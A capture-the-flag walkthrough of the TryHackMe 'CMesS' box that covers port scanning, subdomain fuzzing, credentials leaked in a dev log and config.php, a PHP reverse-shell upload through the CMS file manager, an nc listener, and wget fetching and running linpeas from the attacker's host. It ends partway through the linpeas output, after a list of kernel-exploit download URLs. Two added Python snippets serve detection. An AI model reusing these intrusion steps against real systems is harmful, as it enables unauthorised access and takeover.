CMesS


Can you root this Gila CMS box?

Flags


Please add MACHINE_IP cmess.thm to /etc/hosts

Please also note that this box does not require brute forcing!


┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ tail /etc/hosts                                
ff02::2		ip6-allrouters

#10.10.188.193 lundc.lunar.eruca.com lundc lunar-LUNDC-CA lunar.eruca

#127.0.0.1 irc.cct
10.10.92.0 cdn.tryhackme.loc
10.10.97.54 external.pypi-server.loc
10.10.173.88 cybercrafted.thm admin.cybercrafted.thm store.cybercrafted.thm www.cybercrafted.thm
10.10.101.47 wekor.thm site.wekor.thm
10.10.105.35 cmess.thm

┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ rustscan -a 10.10.105.35 --ulimit 5500 -b 65535 -- -A -Pn

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.105.35:22
Open 10.10.105.35:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 12:26 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Initiating Connect Scan at 12:26
Scanning cmess.thm (10.10.105.35) [2 ports]
Discovered open port 22/tcp on 10.10.105.35
Discovered open port 80/tcp on 10.10.105.35
Completed Connect Scan at 12:26, 0.21s elapsed (2 total ports)
Initiating Service scan at 12:26
Scanning 2 services on cmess.thm (10.10.105.35)
Completed Service scan at 12:26, 6.81s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.105.35.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 7.07s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 1.70s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Nmap scan report for cmess.thm (10.10.105.35)
Host is up, received user-set (0.21s latency).
Scanned at 2023-03-14 12:26:18 EDT for 16s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9b652d3939a3850b4233bfd210c051f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvfxduhH7oHBPaAYuN66Mf6eL6AJVYqiFAh6Z0gBpD08k+pzxZDtbA3cdniBw3+DHe/uKizsF0vcAqoy8jHEXOOdsOmJEqYXjLJSayzjnPwFcuaVaKOjrlmWIKv6zwurudO9kJjylYksl0F/mRT6ou1+UtE2K7lDDiy4H3CkBZALJvA0q1CNc53sokAUsf5eEh8/t8oL+QWyVhtcbIcRcqUDZ68UcsTd7K7Q1+GbxNa3wftE0xKZ+63nZCVz7AFEfYF++glFsHj5VH2vF+dJMTkV0jB9hpouKPGYmxJK3DjHbHk5jN9KERahvqQhVTYSy2noh9CBuCYv7fE2DsuDIF
|   256 21c36e318b85228a6d72868fae64662b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGOVQ0bHJHx9Dpyf9yscggpEywarn6ZXqgKs1UidXeQqyC765WpF63FHmeFP10e8Vd3HTdT3d/T8Nk3Ojt8mbds=
|   256 5bb9757805d7ec43309617ffc6a86ced (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFUGmaB6zNbqDfDaG52mR3Ku2wYe1jZX/x57d94nxxkC
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-generator: Gila CMS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.14 seconds

┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ wfuzz -u cmess.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.cmess.thm" --hc 404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 /home/witty/.local/lib/python3.11/site-packages/requests/__init__.py:89: RequestsDependencyWarning:urllib3 (1.26.15) or chardet (5.1.0) doesn't match a supported version!
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload     
=====================================================================

000000019:   200        30 L     104 W      934 Ch      "dev"       
000000014:   200        107 L    290 W      3898 Ch     "autoconfig"
000000001:   200        107 L    290 W      3877 Ch     "www"       
000000003:   200        107 L    290 W      3877 Ch     "ftp"       
000000007:   200        107 L    290 W      3889 Ch     "webdisk"   
000000016:   200        107 L    290 W      3880 Ch     "test"      
000000018:   200        107 L    290 W      3880 Ch     "blog"      
000000015:   200        107 L    290 W      3874 Ch     "ns"        
000000017:   200        107 L    290 W      3871 Ch     "m"         
000000020:   200        107 L    290 W      3880 Ch     "www2"      
000000013:   200        107 L    290 W      3904 Ch     "autodiscover"
000000005:   200        107 L    290 W      3889 Ch     "webmail"   
000000009:   200        107 L    290 W      3886 Ch     "cpanel"    
000000004:   200        107 L    290 W      3895 Ch     "localhost" 
000000011:   200        107 L    290 W      3877 Ch     "ns1"       
000000006:   200        107 L    290 W      3880 Ch     "smtp"      
000000002:   200        107 L    290 W      3880 Ch     "mail"      
000000012:   200        107 L    290 W      3877 Ch     "ns2"       
000000008:   200        107 L    290 W      3877 Ch     "pop"       
000000010:   200        107 L    290 W      3877 Ch     "whm"       
000000021:   200        107 L    290 W      3877 Ch     "ns3"       
000000024:   200        107 L    290 W      3883 Ch     "admin"     
000000028:   200        107 L    290 W      3880 Ch     "imap"      
000000031:   200        107 L    290 W      3886 Ch     "mobile"    
000000027:   200        107 L    290 W      3874 Ch     "mx"        
000000025:   200        107 L    290 W      3883 Ch     "mail2"     
000000029:   200        107 L    290 W      3877 Ch     "old"       
000000023:   200        107 L    290 W      3883 Ch     "forum"     
000000022:   200        107 L    290 W      3880 Ch     "pop3"      
000000026:   200        107 L    290 W      3877 Ch     "vpn"       
000000035:   200        107 L    290 W      3874 Ch     "cp"        
000000037:   200        107 L    290 W      3880 Ch     "shop"      
000000032:   200        107 L    290 W      3883 Ch     "mysql"     
000000043:   200        107 L    290 W      3883 Ch     "lists"     
000000040:   200        107 L    290 W      3877 Ch     "ns4"       
000000034:   200        107 L    290 W      3889 Ch     "support"   
000000038:   200        107 L    290 W      3880 Ch     "demo"      
000000033:   200        107 L    290 W      3880 Ch     "beta"      
000000030:   200        107 L    290 W      3877 Ch     "new"       
000000036:   200        107 L    290 W      3886 Ch     "secure"    
000000044:   200        107 L    290 W      3877 Ch     "web"       
000000059:   200        107 L    290 W      3895 Ch     "www.forum" 
000000045:   200        107 L    290 W      3880 Ch     "www1"      
000000060:   200        107 L    290 W      3892 Ch     "www.test"  
000000039:   200        107 L    290 W      3880 Ch     "dns2"      
000000047:   200        107 L    290 W      3880 Ch     "news"      
000000058:   200        107 L    290 W      3892 Ch     "intranet"  
000000042:   200        107 L    290 W      3886 Ch     "static"    
000000051:   200        107 L    290 W      3877 Ch     "api"       
000000041:   200        107 L    290 W      3880 Ch     "dns1"      
000000056:   200        107 L    290 W      3877 Ch     "dns"       
000000050:   200        107 L    290 W      3880 Ch     "wiki"      
000000055:   200        107 L    290 W      3886 Ch     "backup"    
000000048:   200        107 L    290 W      3886 Ch     "portal"    
000000054:   200        107 L    290 W      3892 Ch     "www.blog"  
000000046:   200        107 L    290 W      3877 Ch     "img"       
000000052:   200        107 L    290 W      3883 Ch     "media"     
000000053:   200        107 L    290 W      3886 Ch     "images"    
000000049:   200        107 L    290 W      3886 Ch     "server"    
000000057:   200        107 L    290 W      3877 Ch     "sql"       
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 60
Filtered Requests: 0
Requests/sec.: 0

Almost every name comes back 200 with the same 107-line, 290-word page (the char count only grows with the length of the name), so those are the default vhost answering for anything; dev is the one real outlier. Let's add dev, server, sql and backup to /etc/hosts and take a look.
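The wfuzz table above can be post-processed to separate the catch-all responses from real virtual hosts. The Python below is an added example, not part of the original writeup or of wfuzz; the sample rows are constructed in the shape of the output above, and the grouping key (status, lines, words) is my choice.

```python
"""Group wfuzz vhost results by response shape to spot the catch-all.

Added example (not from the original writeup). It post-processes wfuzz's
plain-text table: when nearly every Host header returns a 200 with the same
line/word counts, those hits are the default virtual host answering for
unknown names, and only the outliers deserve a look.
"""
import re
from collections import Counter

# Constructed sample: a few rows in the shape of the wfuzz table above.
SAMPLE_WFUZZ = """\
000000019:   200        30 L     104 W      934 Ch      "dev"
000000014:   200        107 L    290 W      3898 Ch     "autoconfig"
000000001:   200        107 L    290 W      3877 Ch     "www"
000000003:   200        107 L    290 W      3877 Ch     "ftp"
000000016:   200        107 L    290 W      3880 Ch     "test"
000000024:   200        107 L    290 W      3883 Ch     "admin"
000000055:   200        107 L    290 W      3886 Ch     "backup"
"""

# One wfuzz result row: id, status, lines, words, chars, quoted payload.
ROW_RE = re.compile(
    r'^\s*(\d+):\s+(\d{3})\s+(\d+) L\s+(\d+) W\s+(\d+) Ch\s+"([^"]+)"\s*$'
)


def parse_rows(text):
    """Return a list of dicts, one per wfuzz result row; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        rows.append({
            "id": int(m.group(1)),
            "status": int(m.group(2)),
            "lines": int(m.group(3)),
            "words": int(m.group(4)),
            "chars": int(m.group(5)),
            "payload": m.group(6),
        })
    return rows


def find_outliers(rows, min_share=0.5):
    """Split rows into (baseline_shape, outliers).

    The baseline is the (status, lines, words) triple shared by at least
    min_share of all rows. Char counts are left out of the key on purpose:
    in the output above they grow with the length of the requested name,
    so the same default page produces slightly different sizes.
    """
    shapes = Counter((r["status"], r["lines"], r["words"]) for r in rows)
    shape, count = shapes.most_common(1)[0]
    if count < min_share * len(rows):
        return None, rows  # no dominant shape: nothing is obviously a catch-all
    outliers = [r for r in rows if (r["status"], r["lines"], r["words"]) != shape]
    return shape, outliers


if __name__ == "__main__":
    baseline, odd = find_outliers(parse_rows(SAMPLE_WFUZZ))
    print("catch-all shape (status, lines, words):", baseline)
    for r in odd:
        print(f'outlier: {r["payload"]!r} -> {r["chars"]} chars')
```

The same filtering is what wfuzz's --hl/--hw options do at request time; doing it afterwards lets you pick the baseline from the data instead of guessing it up front.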

┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ tail /etc/hosts
ff02::2		ip6-allrouters

#10.10.188.193 lundc.lunar.eruca.com lundc lunar-LUNDC-CA lunar.eruca

#127.0.0.1 irc.cct
10.10.92.0 cdn.tryhackme.loc
10.10.97.54 external.pypi-server.loc
10.10.173.88 cybercrafted.thm admin.cybercrafted.thm store.cybercrafted.thm www.cybercrafted.thm
10.10.101.47 wekor.thm site.wekor.thm
10.10.105.35 cmess.thm dev.cmess.thm server.cmess.thm sql.cmess.thm backup.cmess.thm

If none of them turns up anything interesting, we'll swap in other names.

http://dev.cmess.thm/

Development Log
andre@cmess.thm

Have you guys fixed the bug that was found on live?
support@cmess.thm

Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
support@cmess.thm

Update! We have had to delay the patch due to unforeseen circumstances
andre@cmess.thm

That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
support@cmess.thm

Your password has been reset. Here: KPFTN_f2yxe%

┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ gobuster -t 64 dir -e -k -u http://cmess.thm -w /usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cmess.thm
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2023/03/14 12:41:48 Starting gobuster in directory enumeration mode
===============================================================
http://cmess.thm/.htpasswd            (Status: 403) [Size: 274]
http://cmess.thm/0                    (Status: 200) [Size: 3851]
http://cmess.thm/01                   (Status: 200) [Size: 4078]
http://cmess.thm/1                    (Status: 200) [Size: 4078]
http://cmess.thm/1x1                  (Status: 200) [Size: 4078]
http://cmess.thm/about                (Status: 200) [Size: 3353]
http://cmess.thm/About                (Status: 200) [Size: 3339]
http://cmess.thm/admin                (Status: 200) [Size: 1580]
http://cmess.thm/.hta                 (Status: 403) [Size: 274]
http://cmess.thm/api                  (Status: 200) [Size: 0]
http://cmess.thm/assets               (Status: 301) [Size: 318] [--> http://cmess.thm/assets/?url=assets]
http://cmess.thm/author               (Status: 200) [Size: 3590]
http://cmess.thm/.htaccess            (Status: 403) [Size: 274]
http://cmess.thm/blog                 (Status: 200) [Size: 3851]
http://cmess.thm/category             (Status: 200) [Size: 3862]
http://cmess.thm/cm                   (Status: 500) [Size: 0]
Progress: 1213 / 4615 (26.28%)^C
[!] Keyboard interrupt detected, terminating.

[ERROR] 2023/03/14 12:41:58 [!] context canceled
===============================================================
2023/03/14 12:41:58 Finished
===============================================================

Log in at http://cmess.thm/admin with the credentials from the dev log:

andre@cmess.thm : KPFTN_f2yxe%

Once in, go to Content > File Manager and upload a reverse shell.

Browsing the file manager also shows config.php, which stores the MySQL root credentials in plaintext:

<?php

$GLOBALS['config'] = array (
  'db' => 
  array (
    'host' => 'localhost',
    'user' => 'root',
    'pass' => 'r0otus3rpassw0rd',
    'name' => 'gila',
  ),
  'permissions' => 
  array (
    1 => 
    array (
      0 => 'admin',
      1 => 'admin_user',
      2 => 'admin_userrole',
    ),
  ),
  'packages' => 
  array (
    0 => 'blog',
  ),
  'base' => 'http://cmess.thm/gila/',
  'theme' => 'gila-blog',
  'title' => 'Gila CMS',
  'slogan' => 'An awesome website!',
  'default-controller' => 'blog',
  'timezone' => 'America/Mexico_City',
  'ssl' => '',
  'env' => 'pro',
  'check4updates' => 1,
  'language' => 'en',
  'admin_email' => 'andre@cmess.thm',
  'rewrite' => true,
);

The upload lands in the assets directory, so the reverse shell is reachable at:

http://cmess.thm/assets/payload_ivan.php

┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ rlwrap nc -lvnp 1337                                     
listening on [any] 1337 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.105.35] 48480
SOCKET: Shell has connected! PID: 2496
python3 -c 'import pty;pty.spawn("/bin/bash")'
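From the defender's side, the sequence just shown (admin login, file-manager upload, GET of a .php file under /assets/) is visible in the Apache access log. The Python below is an added example, not from the original writeup; the log lines and client IPs are constructed for the demonstration, and the STATIC_DIRS and SCRIPT_EXTS lists are assumptions to adapt per deployment.

```python
"""Flag script requests under the upload/asset directory in Apache access logs.

Added example (not from the original writeup). A directory that exists to
serve static uploads should never execute server-side code, so a request for
*.php (or another script extension) under it is a high-signal alert. The
alert also records whether the same client hit the admin panel earlier in the
log, which is the sequence a file-manager upload followed by a web shell leaves.
"""
import re
from collections import defaultdict

# Constructed sample in Apache combined-log format; IPs and paths are invented.
SAMPLE_LOG = """\
10.8.19.103 - - [14/Mar/2023:12:44:02 -0400] "GET /admin HTTP/1.1" 200 1580 "-" "Mozilla/5.0"
10.8.19.103 - - [14/Mar/2023:12:44:09 -0400] "POST /admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.8.19.103 - - [14/Mar/2023:12:46:31 -0400] "GET /assets/logo.png HTTP/1.1" 200 4212 "-" "Mozilla/5.0"
10.8.19.103 - - [14/Mar/2023:12:47:55 -0400] "GET /assets/payload_ivan.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.0.7 - - [14/Mar/2023:12:48:10 -0400] "GET /assets/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Combined log: client, identd, user, [timestamp], "METHOD path proto", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed: directories that hold uploads/static files, and extensions that
# should never be requested (and therefore executed) there.
STATIC_DIRS = ("/assets/", "/uploads/")
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def detect_script_in_static_dir(log_text):
    """Return one alert per script-extension request under a static directory."""
    seen_admin = defaultdict(bool)   # client IP -> has requested /admin before
    alerts = []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        # Strip the query string and compare case-insensitively (PHP is served
        # for .PHP too on case-insensitive setups).
        path = e["path"].split("?", 1)[0].lower()
        if path.startswith("/admin"):
            seen_admin[e["ip"]] = True
        if path.startswith(STATIC_DIRS) and path.endswith(SCRIPT_EXTS):
            alerts.append({
                "ip": e["ip"],
                "path": e["path"],
                "status": e["status"],
                "prior_admin_access": seen_admin[e["ip"]],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_script_in_static_dir(SAMPLE_LOG):
        print(alert)
```

Pairing the alert with the earlier /admin hits from the same client is what turns "someone requested a PHP file" into "the admin account uploaded and ran one", which is the incident to investigate.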

Let's transfer linpeas to the box.

┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.105.35 - - [14/Mar/2023 12:50:03] "GET /linpeas.sh HTTP/1.1" 200 -

www-data@cmess:/var/www/html/assets$ cd /tmp
cd /tmp
www-data@cmess:/tmp$ wget http://10.8.19.103:1234/linpeas.sh
wget http://10.8.19.103:1234/linpeas.sh
--2023-03-14 09:50:03--  http://10.8.19.103:1234/linpeas.sh
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: 'linpeas.sh'

2023-03-14 09:50:08 (203 KB/s) - 'linpeas.sh' saved [828098/828098]

www-data@cmess:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@cmess:/tmp$ ./linpeas.sh

          linpeas-ng by carlospolop


 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 4.4.0-142-generic (buildd@lgw01-amd64-033) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: cmess
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)



Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.4.0-142-generic (buildd@lgw01-amd64-033) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04.6 LTS
Release:	16.04
Codename:	xenial

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16

╔══════════╣ CVEs Check
Potentially Vulnerable to CVE-2022-2588



╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Date & uptime
Tue Mar 14 10:00:25 PDT 2023
 10:00:25 up 37 min,  0 users,  load average: 2.53, 2.05, 1.55

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=5c88f34b-fd0f-4ec2-8c34-04067bb27ec4	/	ext4	errors=remount-ro	0 1
UUID=e33d49cc-1f73-4faf-b2f2-fd4f6c601c58	none	swap	sw	0 0

╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
SHLVL=1
OLDPWD=/var/www/html/assets
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
_=./linpeas.sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

